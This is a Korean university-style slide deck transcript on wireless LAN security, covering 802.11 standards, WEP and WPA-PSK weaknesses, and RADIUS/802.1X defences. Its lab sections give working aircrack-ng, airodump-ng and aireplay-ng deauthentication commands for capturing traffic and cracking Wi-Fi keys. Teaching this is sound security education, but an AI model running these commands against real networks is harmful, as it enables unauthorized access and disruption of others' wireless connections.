12 무선 네트워크 보안과 취약점.

Slides:



Advertisements
Similar presentations
무선 네트워크 경일대학교 컴퓨터 공학부 이 지훈 이 시욱.
Advertisements

을지대학교 무선 네트워크 사용 방법 2010 년 06 월 01 일. 을지대학교 무선 네트워크 사용 방법 1. PC 무선랜 카드 활성화 및 체크 1 단계 : 시작 -> 설정 -> 네트워크 설정 2 단계 : 무선 네트워크 설정 선택 -> 마우스 버튼 오른쪽 클릭 -> 사용.
불특정 공격에 무너진 H 사 업무 시스템 서서히 저하 내부에서 원인 불명으로 네트워크의 속도가 서서히 저하 되는 현상이 발생 공격의 발생 핵심 장 비 서비스가 되다 되지 않는 현상이 심해지고 결국 핵심 장 비는 장애가 발생하게 됨 장비 장애 발생 핵심 장비 장애 전체.
7 장. 원격지에서 리눅스서버를 관리하자. 텔넷서버를 설치 / 운영한다. SSH 서버를 운영한다. VNC 서버를 설치 / 운영한다.
HTTPS Packet Capture Tutorial

목차 Contents 무선인터넷용 비밀번호 설정방법 Windows 7 Windows 8 Windows XP MAC OS.
정보 보안 개론과 실습 네트워크 해킹과 보안 3부 해킹 전 정보 획득 Chapter 10. 목록화.
Part TCP / IP(계속) 3. IP 주소 4. IP 라우팅 5. 응용 프로토콜.
안성시립도서관 무선랜 사용자 Mac 확인 및 설정방법
CHAP 22. 블루투스.
김태원 심재일 김상래 강신택. 김태원 심재일 김상래 강신택 인터넷 통신망의 정보를 제공하는 서비스 인터넷의 자원 및 정보는 NIC가 관리 IP주소 또는 도메인으로 정보 검색 이용자 및 통신망 관한 정보를 제공.
<<< 시스템등록정보 “하드웨어-장치관리자” 설정 >>>
Android Wi-Fi Manual (Guest용)
Wireless LAN Security.
Network Lab. Young-Chul Hwang
10장. 무선 LAN의 기본개념과 설정방법 2012년 2학기 중부대학교 정보보호학과 이병천 교수.
Chapter 14 Wireless LAN.
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
메카 세미나 무선통신
PHP입문 Izayoi 김조흔.
무선 랜 보안 세종대학교 소프트웨어공학 김명현.
무선 네트워크 해킹과 보안 발표 구조 : 네트워크 기초 -> 무선 기초 -> 보안 기초 -> 해킹 시연 -> 방지 방법 김태욱.
Chapter 13 Wired LANs: Ethernet.
4장. 웹로직 서버상에서의 JDBC와 JTA의 운용
무선인터넷 보안기술 컴퓨터공학부 조한별.
11 장 LAN 기본 개념과 Ethernet LAN
컴퓨터 네트워크 II - 기말고사 토폴로지 발표자료
Part 4 네트워크 해킹 16장 무선 네트워크 김 미 진.
8장. 원격지 시스템 관리하기.
소리가 작으면 이어폰 사용 권장!.
HomeNetWork의 개념과 실생활의 예
NJM Messenger 박상원 박연호.
                              데이터베이스 프로그래밍 (소프트웨어 개발 트랙)                               퍼스널 오라클 9i 인스톨.
01. DHCP의 개념 조직의 네트워크에 연결되어 있는 워크스테이션의 TCP/IP 설정을 자동화하기 위한 표준 프로토콜
WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T..
01. 터미널 서비스의 개요 터미널 서비스는 네트워크의 워크스테이션을 서버 컴퓨터의 터미널로 사용할 수 있도록 해 주는 서비스
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
10장. 무선 LAN의 기본개념과 설정방법 2012년 2학기 중부대학교 정보보호학과 이병천 교수.
시스템 인터페이스 Lab3 Unix 사용법 실습.
12 무선 네트워크 보안과 취약점.
WZC 무선 연결 방법 (Windows XP Ver.).
HTTP 프로토콜의 요청과 응답 동작을 이해한다. 서블릿 및 JSP 를 알아보고 역할을 이해한다.
Wi-Fi 취약점 분석 본 프로젝트는 Wi-Fi 환경에서의 취약점 분석을 위한 프로젝트로 다양한 공격방법을 테스트
뇌를 자극하는 Windows Server 장. 원격 접속 서버.
블루투스를 이용한 무선 스피커 구현 이기문 황대연.
Nessus 4 설치 정보보호응용 조용준.
PC에 설치된 엔드포인트 클라이언트 프로그램을 클릭하여 프로그램 상자를 엽니다
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
McGraw-Hill Technology Education
10장. 무선 LAN의 기본개념과 설정방법 2012년 2학기 중부대학교 정보보호학과 이병천 교수.
ASP.NET AJAX / AJAX Control Toolkit 응용 2008 컴퓨터공학실험( I )
16 장 네트워크 보안 : 방화벽과 VPN 16.1 개요 16.2 기밀성 16.3 전자 서명 16.4 인터넷 보안
-네트워크 관리 개요 및 SNMP 프로토콜 동작과정
14강. 세션 세션이란? 세션 문법 Lecturer Kim Myoung-Ho Nickname 블스
네트워크 환경 구축과 이미지 전송 호스트/타겟 통신 직렬 통신을 이용한 이미지 전송 수퍼 데몬 BOOTP 환경 구축
01. DHCP의 개념 조직의 네트워크에 연결되어 있는 워크스테이션의 TCP/IP 설정을 자동화하기 위한 표준 프로토콜
01. 개요 네트워크에 있는 컴퓨터와 그룹에 대한 NetBIOS 이름에 대응되는 IP 주소를 찾아주는 서비스
IP-255S 설치 교육자료 101/102에 대한 설명을 시작 하겠습니다.
클러스터 시스템에서 효과적인 미디어 트랜스코딩 부하분산 정책
LAN의 구성요소 학습내용 서버 클라이언트 NIC(Network Interface Card) 전송매체
WZC 무선 연결 방법 (Windows 7 Ver.).
01. 분산 파일 시스템의 개요 네트워크에 분산된 파일을 사용자가 쉽게 접근하고 관리할 수 있게 해준다.
세션에 대해 알아보고 HttpSession 에 대해 이해한다 세션 관리에 사용되는 요소들을 살펴본다
1. Vista Wireless LAN 설정하기
프로그래밍 언어 학습을 위한 가상실습환경 창원대학교 이수현.
Network Lab. Young-Chul Hwang
ARP.
SafeMSR 설정.
10장. 무선 LAN의 기본개념과 설정방법 중부대학교 정보보호학과 이병천 교수.
Presentation transcript:

12 무선 네트워크 보안과 취약점

학습목표 내용 무선 네트워크를 이해한다. 무선 네트워크에 해킹 공격을 실행할 수 있다. 무선 랜에 대한 보안 대책을 이해한다. 무선 네트워크에 대한 이해 WEP WPA-PSK 무선 랜 보안

무선 네트워크에 대한 이해 무선 랜 유선 랜에 비해 통신의 한계가 분명치 않으며, 방향성이 없어 클라이언트가 어느 거리, 어느 방향에서 접속하는지에 대한 정보를 얻을 수 없음 보급 초기에는 무선 네트워크 붐이 일어 많은 회사가 사내 무선 랜을 설치했지만 무선 랜의 취약한 보안 때문에 사내 네트워크가 그대로 노출되어 무선 랜을 서둘러 다시 제거 하는 해프닝을 벌이기도 함 컴퓨터 통신에서 무선 랜은 2.4GHz 통신망을 이용하며, 표준 규약으로 802.11 사용 802.11에는 802.11b, 802.11a, 802.11g, 802.11n 등이 있음 초기의 속도 11Mbps인 802.11b를 사용하는 무선 랜은 점차 사라지고, 54Mbps를 지원 하는 802.11g와100Mbps 이상을 지원하는 802.11n으로 발전

무선 네트워크에 대한 이해 주요 무선 랜 프로토콜

무선 네트워크에 대한 이해 IEEE 802.11 IEEE 802는 컴퓨터 통신망의 표준화를 추진하고 있는 IEEE 802 위원회가 개발한, 일 련의 LAN 접속 방법 및 프로토콜 국제 표준 지칭 11은 무선 랜 관련 표준 위원회. IEEE 802.11 위원회는 1990년 10월부터 무선 매체 접 근 제어 물리 계층 규격에 대한 표준화를OSI 참조 모델에 준하여 진행 중 IEEE 802.11b 802.11 규격을 기반으로 더욱 발전시킨 기술 최고 전송 속도는 11Mbps지만, 실제로는 CSMA/CA 기술의 구현 과정에서 6~7Mbps 정도 효율 을 나타내는 것으로 알려져 있음 IEEE 802.11a 5GHz 대역의 전파를 사용하는 규격 OFDM 기술을 사용해 전송 속도를 최고 54Mbps까지 지원 5GHz는 2.4GHz 대역에 비해 다른 통신기기(무선 전화기, 블루투스 기기 등)와의 간섭이 적고, 더 넓은 전파 대역을 사용할 수 있다는 장점이 있지만 신호의 특성상 장애물이나 도심 건물 등 주변 환경의 영향을 쉽게 받고, 2.4GHz 대역에서 54Mbps 속도를 지원하는802.11g 규격이 등장하면서 현재는 널리 쓰이지 않음 IEEE 802.11g 802.11a 규격과 전송 속도가 같고 2.4GHz 대역 전파를 사용한다는 점만 다름 널리 사용되는 802.11b 규격과 쉽게 호환되어 현재 널리 쓰임

무선 네트워크에 대한 이해 무선 랜의 이용과 통신 범위 IEEE 802.11n 상용화된 전송 규격으로 2.4GHz 대역과 5GHz 대역을 사용하며 최고 300Mbps까지 속도 지원 우리나라의 경우 기술 규격 내 주파수 점유 대역폭의 문제(2개의 채널 점유)로 135~144Mbps로 속도가 제한되었으나, 2007년 10월 17일 전파 연구소의 기술기준고시로 300Mbps까지 사용할 수 있게 됨 무선 랜의 이용과 통신 범위 무선 랜은 ‘Ethernet Like’개념으로, 보통 내부 네트워크의 확장으로 이용 무선 랜을 사용하려면 내부의 유선 네트워크에AP(Access Point) 장비를 설치해야 함

무선 네트워크에 대한 이해 무선 랜의 전송 가능 거리 무지향성 안테나는 보통 봉 형태로 전파 수신에 일정한 방향성이 없어 AP의 위치에 상관없이 동작. 보통 4개 이상의 방향성이 있다고 말하는 것이 더 정확 지향성은 다시 수직과 수평면에 대한 것으로 나뉘고, 대부분의 무지향성 안테나는 수평면에 대한 무지향성만 지원 [그림 12-2] 무지향성 안테나 [그림 12-3] 지향성 안테나

무선 네트워크에 대한 이해 무선 랜 접속 윈도우 기본 제공 [무선 네트워크 연결]에서 사용 가능한 무선 랜 확인하여 접속을 원하는 무선 랜 선택 NetStumbler(넷 스텀블러)를 사용해 무선 AP 검색 가능 : AP의 MAC 주소, SSID, 통신 채널 (channel), 신호 강도, 노이즈 등에 관한 정보를 얻을 수 있음

무선 네트워크에 대한 이해 리눅스 기타 kismet(키스멧) 툴을 사용 구글맵과 함께 제공하는 Wigle(위글)과 같은 서비스 이용

실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기 실습환경 [그림 12-7] Atheros 칩셋을 사용하는 무선 랜 카드 검색 • 공격자 시스템 : 리눅스 페도라 12 • 공격 대상 시스템 : 리눅스 페도라 12 • 필요 프로그램 : madwifi-0.9.4.tar.gz (Atheros 칩셋 리눅스 드라이버) 실습환경

실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기 무선 랜 카드 확인 iwconfig 1

실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기     필요 라이브러리 설치 2-1 kernel-devel 설치 ➊ yum list kernel-devel* ➋ yum install kernel-devel.i686 2-2 kernel-headers 설치 ➊ yum list kernel-headers*➋ yum install kernel-headers.i686 2    

실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기     기존 무선 랜 드라이버 제거 3-1 ath5k.ko, ath9k.ko, ath.ko로 확인된 Atheros 네트워크 모듈 ➊ ifconfig wlan0 down ➋ modprobe -l *ath* ifconfig wlan1 down 3-2 ath5k.ko, ath9k.ko, ath.ko 모듈 사용 금지 목록 등록 ➊ echo "blacklist ath5k" >> /etc/modprobe.d/blacklist ➋ echo "blacklist ath9k" >> /etc/modprobe.d/blacklist ➌ echo "blacklist ath" >> /etc/modprobe.d/blacklist 3    

실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기 무선 랜 해킹용 드라이버 설치 4-1 madwifi의 압축 풀어 설치 ➊ tar xvf madwifi-0.9.4-current.tar.gz ➋ cd madwifi-0.9.4-current ➌ make ➍ make install 4-2 iwconfig 명령으로 무선 네트워크 인터페이스 확인 iwconfig 4

실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기   4-3 스니핑용 가상 인터페이스 생성과 ath1 확인 ➊ wlanconfig ath create wlandev wifi0 wlanmode monitor ➋ iwconfig  

WEP WEP(Wired Equivalent Privacy) 무선 랜 통신을 암호화하기 위해 802.11b 프로토콜부터 적용 1987년에 만들어진 RC 4 암호화 알고리즘을 기본으로 사용 64/128비트 사용 가능. 64비트는 40비트, 128비트는 104비트 RC 4 키 사용 WEP을 이용한 암호화 세션 암호화 과정에서 암호화키와 함께 24비트의 IV(Initial Vector)를 사용. 통신 과정에 서 IV는 랜덤으로 생성되어, 암호화키에 대한 복호화를 어 렵지만 24비트의 IV는 통신 과 정에서 24비트의 짧은 길이로 인해 반복 사용되며, 반복 사 용이 WEP 키의 복호화를 쉽 게 함 무선 통신에서 네트워크 패킷 에 포함된 IV를 충분히 수집하 여 WEP 키를 크랙할 경우1분 이내에도 복호화 가능

실습 12-2 WEP 키 크랙하기 실습환경 • 공격자 시스템 : 리눅스 페도라 12 • 공격 대상 시스템 : 윈도우 XP • 필요 프로그램 : aircrack-ng 실습환경

실습 12-2 WEP 키 크랙하기 실습 환경 구성 1-1 무선 랜 공유기에서 WEP 키 설정

실습 12-2 WEP 키 크랙하기 실습 환경 구성 ➊ yum list aircrack* ➋ yum install aircrack-ng.i686 무선 랜 패킷 수집 airodump-ng --ivs --channel 1 -w wep ath1 2   3 •--ivs : 무선 랜 패킷 스니핑 시 암호화 크랙에 필요한 IV만 수집한다. •--channel 1 : 통신 채널은 1만 스니핑한다. •-w wep : WEP 키에 관한 내용을wep.ivs 파일에 저장한다.

실습 12-2 WEP 키 크랙하기   WEP 키 크랙 4-1 aircrack-ng에서 대상 네트워크 선택 ➊ aircrack-ng wep-01.ivs ➋ 3 선택 4-2 aircrack-ng에서 크랙된 WEP 키 확인 4  

WPA-PSK WPA-PSK(Wi-Fi Protected Access Pre-Shared Key) 802.11i 보안 표준 중 일부분으로 WEP 방식의 보안 문제점을 해결하기 위해 만들어짐 WEP처럼 AP와 통신해야 할 클라이언트에 암호화키를 기본으로 등록해두고 있지만 암 호화키를 이용해128비트인 통신용 암호화키를 새로 생성하고, 이 암호화키를 10,000개 패킷마다 바꿈 암호화 알고리즘으로 TKIP 또는 AES를 사용할 수 있으며, WEP보다 훨씬 더 강화된 암 호화 세션을 제공 AP에 접속하는 사용자마다 같은 암호화키를 사용한다는 점이 보안상 미흡

실습 12-3 WPA-PSK 키 크랙하기 실습환경 • 공격자 시스템 : 리눅스 페도라 12 • 공격 대상 시스템 : 윈도우 XP • 필요 프로그램 : aircrack-ng 실습환경

실습 12-3 WPA-PSK 키 크랙하기 실습 환경 구성 : 무선 랜 공유기에서 WPA-PSK 키 설정 1

실습 12-3 WPA-PSK 키 크랙하기 WPA-PSK 인증 패킷 수집 2-1 airodump-ng를 이용한 패킷 스니핑 airodump-ng --channel 1 -w wpa-psk ath1 2-2 aireplay-ng를 이용한 세션 중단 공격 aireplay-ng -0 5 -c 00:21:5d:2d:9b:ce -e wishfree ath1 2 • -0 5 : 세션을 끊는 패킷(DeAuth)을 5 번 보낸다. • -c 00:16:6F:35:B4:74 : 공격 대상으로 확인된 클라이언트의 MAC 주소다. 이 주소는 airodump 화면에서 확인할 수 있다. • -e wishfree : 공격 대상AP의 SSID다.

실습 12-3 WPA-PSK 키 크랙하기 WPA-PSK 키 크랙 3-1 aircrack-ng에서 대상 네트워크 선택 aircrack-ng -w dic wpa-psk-01.cap 3-2 aircrack-ng에서 크랙된 WPA-PSK 키 확인 3

무선 랜 보안 무선 네트워크의 문제점에 대한 대응책 AP 보호를 위해서는 전파가 건물 내부로 한정되도록 전파 출력을 조정하고 창이나 외부 에 접한 벽이 아닌 건물 안쪽 중심부, 특히 쉽게 눈에 띄지 않는 곳에 설치 AP 관리 계정의 패스워드를 반드시 재설정 AP의DHCP를 정지 AP의 접속 MAC 주소 필터링 SSID(Service Set Identifier)와 WEP(Wired Equivalent Privacy)을 설정 802.1X와 RADIUS 서버를 이용해 인증 무선 네트워크 공격은 AP를 찾는 것부터 시작 무선 AP를 찾으려면 무선 안테나를 구입하거나 제작하여 버스를 타고 브라우징 SSID는 AP에서 브로드캐스팅되며, 대부분의 AP가 자동 IP 주소 할당으로 작동

무선 랜 보안 RADIUS와 802.1X를 이용한 무선 랜 인증 ➊ 클라이언트는AP에 접속을 요청한다. ➌ RADIUS 서버는 클라이언트에 인증 Challenge를 전송한다. ➍ 클라이언트는 Challenge에 대한 응답으로, ID와 패스워드에 대한 해시 값을 구해 RADIUS 서버에 전송한다. ➎ RADIUS 서버가 사용자 관리 데이터베이스 정보를 사용해 Challenge의 응답에 대한 해시 값을 구 하여 클라이언트의 해시 값과 비교한다.

무선 랜 보안 ➏ RADIUS 서버가 클라이언트를 인증하면 이러한 과정을 역으로 수행하여 클라이언트가 RADIUS 서버를 인증한다. 클라이언트와 RADIUS의 상호 인증이 이루어진다. ➐ 클라이언트와 RADIUS 서버의 상호 인증이 성공적으로 완료되면, 네트워크 접근을 위한 적당한 클라이언트의 수준을 정의하고 클라이언트를 구별할 수 있는WEP 키를 각각 결정한다. ➑ RADIUS 서버는 세션키(Session-Key)라고 부르는 WEP 키를 유선 랜에 위치한 AP에 전송한다. ➒ AP는 세션키로 브로드캐스트 키를 암호화하여 클라이언트에 암호화된 키를 전송한다. ➓ 클라이언트는 브로드캐스트된 암호화된 키를 복호화하기 위해 세션키를 사용한다. 클라이언트와 AP는 WEP을 활성화하며, 세션이 성립되어 있는 시간 동안 통신에 세션과 브로드 캐스트 키를 사용한다. 11